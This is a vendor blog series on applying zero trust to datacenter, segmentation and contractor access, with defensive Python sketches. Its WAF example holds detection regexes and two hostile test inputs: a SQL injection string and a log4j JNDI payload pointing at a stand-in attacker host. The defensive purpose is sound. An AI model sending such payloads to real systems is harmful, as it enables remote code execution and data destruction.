What is a Zero Trust Philosophy?

Zero Trust: It's a philosophy, not a plan

The Mindset

One of the current trends in IT security that gets a lot of press and discussion is the idea of zero trust. Zero trust, however, is really a philosophy, not a plan of action. Specifically, zero trust is the philosophy that all IT resources, whether internal or external, should be treated as untrusted or even potentially compromised. While the philosophy is simple to state, applying it to a live environment can be anything but simple! Adopting a zero trust mindset requires a holistic approach to security and good cooperation among all stakeholders in the organization, and it extends beyond the technology infrastructure to the employees and even the organizational policies themselves.

It’s important to keep in mind that the threat landscape is always changing – what may have been good practice five years ago may not be so today. This is what drove us at Crossconnect to develop a series of posts laying out how to adopt a zero trust philosophy in your organization.

Getting Started

This series will explore various aspects of technology infrastructure with an eye toward how things are built when approached with a zero trust mindset. Before we get into those details, it's worth taking some time to think about the big-picture questions – many of the areas of security we'll talk about have options ranging from 'very simple' to 'year-long project.' Figuring out where the effort needs to go will go a long way toward creating an effective security infrastructure for your organization.

Foundations of Zero Trust Philosophy

The first step in planning is to think about the capabilities of your organization and the threats you're likely to face. Many threats are industry- or organization-specific, but some are universal. First, of course, is ransomware – probably the biggest general threat most organizations will face. Fraud and theft also rank high among general threats. Sometimes the organization's data itself is the target – there are plenty of groups who want confidential information for any number of reasons, even just to leak it to the public. And finally, bad actors may compromise your organization simply to gain access to a 3rd party's network via yours – think contractors and other service providers.

Next, look at your internal capabilities. Security is, unfortunately, time-consuming to manage, and some solutions are hard to run well with limited staff and budget. When evaluating security products and services, consider what your organization can realistically manage and monitor – a simple but well-managed system is going to be more effective than a very capable yet complex, maintenance-intensive system that gets neglected.

Once you have a good understanding of your threats and capabilities, it's time to build a plan. The core of a security plan is to inventory the applications in use, the files and information that need to be accessed, and the infrastructure they run on, then figure out who and what needs access. The goal is to limit access for any device, user, or application to only the resources it needs.
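
As a starting point, it can help to capture that inventory in a simple, reviewable form. The sketch below (in Python, purely for illustration – the application names, groups, and structure are all hypothetical assumptions, not a prescribed format) shows the kind of application-to-access mapping the plan is built around.

```python
# Minimal sketch of an access inventory. All names here are hypothetical
# examples; the point is to record, per application, which groups need
# access and nothing more.
access_plan = {
    "erp": {
        "runs_on": ["dc-app-01", "dc-db-01"],
        "allowed_groups": ["finance", "warehouse"],
        "protocols": ["https"],
    },
    "file-share": {
        "runs_on": ["dc-file-01"],
        "allowed_groups": ["all-employees"],
        "protocols": ["smb"],
    },
}

def needs_review(app: str, group: str) -> bool:
    """Flag any access request that is not already part of the plan."""
    entry = access_plan.get(app)
    return entry is None or group not in entry["allowed_groups"]

print(needs_review("erp", "contractors"))  # True -> not in the plan, review it
```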

Zero Trust Philosophy Index

This series will explore the areas of security that need to be addressed to make your plan a reality and discuss specific areas of focus for applying a zero trust mindset.

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.

User to Machine Security

Zero Trust in the Datacenter – Protecting Your Servers from Your Users

For the first part of our exploration of the zero trust philosophy, we're going to look at the datacenter.

It’s All in the Flow

When we look at the datacenter, we have two types of traffic flows, each of which needs to be examined from a security perspective. First is user to machine security. Protecting one's datacenter resources from users has always been a necessity; however, the types of threats and what we consider a user have changed a lot over the years. Second is machine to machine security. This area of datacenter security is much newer and has historically been challenging and expensive to implement. We'll focus on user to machine security for now – machine to machine security will be discussed in a future post.

Note: What we discuss here can easily be applied to servers located on-prem, co-located, or even in the public cloud. 

On to User to Machine Security

The primary type of user to machine security is what's commonly referred to as north-south security, where the focus is on Internet users. Exposing necessary resources to the Internet is a requirement for obvious reasons, but Internet-based threats are omnipresent and can be highly sophisticated. It may seem obvious, but it bears repeating that any security policy should grant only the necessary access privileges. For Internet-facing users this is usually easy – modern websites and applications typically only need inbound HTTP/HTTPS traffic on ports 80 and 443. Legacy applications can complicate this, though, so always work with the application team to understand everything the application needs in order to function, and build access policies appropriate to your environment.
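
To make the go/no-go nature of this kind of policy concrete, here is a minimal Python sketch of a default-deny, port/protocol allow list for an Internet-facing web application. The rule set and function names are illustrative assumptions only – in practice these rules live on a firewall or load balancer, not in application code.

```python
# Sketch of a default-deny allow list: only HTTP/HTTPS reaches the web tier.
ALLOWED = {("tcp", 80), ("tcp", 443)}

def permit(protocol: str, dst_port: int) -> bool:
    """Go/no-go decision: anything not explicitly allowed is dropped."""
    return (protocol, dst_port) in ALLOWED

print(permit("tcp", 443))   # True  -> allowed
print(permit("tcp", 3389))  # False -> RDP from the Internet is denied
```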

Beyond simple access controls, it's also important to consider what users are inputting into the application.

For example, putting malicious content in an HTTP POST request is a very common way of trying to get the application to give up information, grant inappropriate access, or otherwise misbehave in a way that benefits the attacker. How to abuse application inputs is firmly out of scope for this post – whole books have been written on exploiting things at the application level. Addressing this kind of abuse is also more complicated. Port and protocol filtering is really a go/no-go type of rule, while inspecting inputs is much harder due to the open-ended nature of user input. There are application best practices for sanitizing user inputs, but especially with proprietary applications, it's not always possible to apply them. It's also better to stop malicious traffic before it ever touches the application. For this, we most commonly use a web application firewall (WAF).

What is a WAF?

With a WAF, we can look directly at the payload of interesting packets and filter based on their contents. For example, a field on a website that's meant for name input shouldn't ever have SQL syntax appearing in it. On the WAF, a rule is created (using lots of regexes!) to identify anything like this and block it. WAFs and similar application-specific security tools are, unfortunately, a Very Hard Thing to implement. The nature of a WAF means that HTTPS traffic needs to be decrypted, which presents challenges in doing so without breaking TLS. Once that's been dealt with, building appropriate rules requires close collaboration between the security and application teams to ensure that the WAF is blocking everything it should be, and that rules are updated as applications change or new threats emerge. The infamous log4j vulnerability is one that a good WAF rule can easily block, but building that rule requires solid regex skills and an understanding of how the vulnerability is exploited. To see what a sample WAF rule blocking log4j exploit attempts looks like, F5 has a ready-to-go iRule available here.
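
To illustrate the idea (not the actual F5 iRule linked above, which is written in F5's own rule language), here is a deliberately simplified Python sketch of WAF-style payload inspection. The field names and regex patterns are hypothetical and naive – production rules have to account for encodings and obfuscation attempts.

```python
import re

# Simplified, WAF-style payload inspection. These patterns are deliberately
# naive and hypothetical; real rules must handle encodings and obfuscation.
SQL_IN_NAME_FIELD = re.compile(r"\b(select|union|insert|drop)\b|--", re.IGNORECASE)
LOG4J_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def block_request(field_name: str, value: str) -> bool:
    """Return True if the submitted value looks like an injection attempt."""
    if field_name == "name" and SQL_IN_NAME_FIELD.search(value):
        return True  # SQL syntax has no business in a name field
    if LOG4J_JNDI.search(value):
        return True  # classic log4j JNDI lookup pattern
    return False

print(block_request("name", "Robert'); DROP TABLE users;--"))         # True
print(block_request("comment", "${jndi:ldap://attacker.example/a}"))  # True
print(block_request("name", "Jane Doe"))                              # False
```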

Other User to Machine Security Considerations

The next part of user to machine security is a somewhat newer topic – protecting your datacenter resources from your own users. This is also referred to as internal segmentation. Historically, trying to firewall your users off from your datacenter was difficult, expensive, and of limited value. Times have changed, and we're at a point where your users can be as dangerous to the business as an Internet-based threat. Studies of where attacks gain their initial foothold show that 90% or more of attacks begin with a user opening a malicious email or running a bad executable. Once run, the malware begins to crawl the network looking for vulnerabilities it can use to gain a foothold in the datacenter, then goes to work exfiltrating or encrypting data or otherwise disrupting business operations. With a traditional setup where internal users are considered trustworthy, their traffic is treated as good by default and isn't firewalled. Given the statistic above, that is not a good stance to take.

Callout: Internal segmentation of some variety should be considered a must-have in a modern, security-first network design.

Implementing Internal Segmentation

This is one of those tasks whose complexity is hard to pin down. On the simple end of the spectrum, putting basic security ACLs in place at the border device between the DC and the users is surprisingly effective for the amount of effort it takes. Most organizations should be looking at a firewall for this purpose, though. Modern firewalls have many more options for inspecting traffic, detecting threats, and alerting IT staff when something is found. Some features are actually easier to implement on an internal segmentation firewall, too. SSL inspection is one of the best examples. Cracking open TLS traffic is a notoriously resource-intensive task and, if done for Internet-bound traffic, can easily overwhelm a firewall, break websites, or even cause HR issues when certain types of user communications are inspected (banking and health information are two major no-nos for deep packet inspection). SSL inspection between users and the datacenter has none of these concerns. Traffic volumes between users and the DC are usually well known and don't change much, so firewalls can be sized effectively to avoid performance issues.
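
As a rough illustration of what a basic border policy between user networks and the datacenter enforces, here is a minimal Python sketch. All subnets, ports, and names are hypothetical assumptions – real rules belong on the border firewall or layer 3 switch, with a default deny that is logged and alerted on.

```python
import ipaddress

# Sketch of internal segmentation between user networks and the datacenter.
# Subnets and ports are made up for illustration only.
USER_NETS = [ipaddress.ip_network("10.10.0.0/16")]
DC_RULES = [
    # (destination network, protocol, port)
    (ipaddress.ip_network("10.20.1.0/24"), "tcp", 443),   # web front ends
    (ipaddress.ip_network("10.20.2.10/32"), "tcp", 445),  # file server
]

def evaluate(src: str, dst: str, proto: str, port: int) -> str:
    src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if not any(src_ip in net for net in USER_NETS):
        return "deny+log"  # unexpected source talking to the DC
    for net, p, prt in DC_RULES:
        if dst_ip in net and proto == p and port == prt:
            return "permit"
    return "deny+log"  # default deny, and alert on it

print(evaluate("10.10.5.23", "10.20.1.15", "tcp", 443))   # permit
print(evaluate("10.10.5.23", "10.20.2.10", "tcp", 3389))  # deny+log
```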

As for concerns about user privacy, interaction with internal resources and data is pretty much open season for whatever security you want to implement – there's nothing in, say, an employee's interactions with the organization's ERP system that would be out of bounds to inspect, log, and audit.

Some Final Considerations

One final thing to consider is how to treat access for 3rd party contractors and how to properly categorize their traffic. The prevailing wisdom these days is to treat 3rd party contractors as equivalent to Internet-facing users, as several high-profile intrusions were launched via a 3rd party with direct access to sensitive resources. It's a little more difficult than that, though – simply allowing ports 80 and 443 through to a list of servers isn't enough. 3rd party contractors may need specialized access or a large number of permit rules compared to either an employee or an Internet user, so close coordination with your 3rd party is required to keep access requirements to a minimum. Due to the complexity of building network-based security policies suitable for contractors, another option we're seeing adopted more often lately is deploying jump servers with enhanced access management software, such as what Bomgar or SecureLink provide. This type of software gives IT staff additional capabilities, such as full session monitoring, access notification, and the ability to allow logins only at specific times or only when explicitly approved by the IT staff. With this level of control on the jump server, it becomes easier to build other security policies in a much more general way. Since all users access resources via the jump server, access control rules only have to permit a small number of hosts from known subnets, and detailed application-based or port/protocol-based rules can often be omitted or reduced in complexity.
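
To show the kind of controls described above in concrete terms, here is a minimal Python sketch of a time-windowed, approval-gated access check with an audit trail. This is not the API of Bomgar, SecureLink, or any other real product – every name and value in it is a hypothetical assumption.

```python
from datetime import datetime, timezone
from typing import Optional

# Sketch of the control ideas behind jump-server access management:
# explicitly approved, time-windowed logins with an audit trail.
APPROVED_WINDOWS = {
    # (contractor, jump host) -> approved UTC hours (start, end)
    ("acme-hvac", "jump-01"): (8, 17),
}

def may_connect(contractor: str, host: str, now: Optional[datetime] = None) -> bool:
    now = now or datetime.now(timezone.utc)
    window = APPROVED_WINDOWS.get((contractor, host))
    allowed = window is not None and window[0] <= now.hour < window[1]
    # Every attempt is logged, whether or not it succeeds.
    print(f"audit: {contractor} -> {host} at {now.isoformat()} allowed={allowed}")
    return allowed

may_connect("acme-hvac", "jump-01")       # allowed only inside the approved window
may_connect("unknown-vendor", "jump-01")  # no approval on file -> always denied
```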
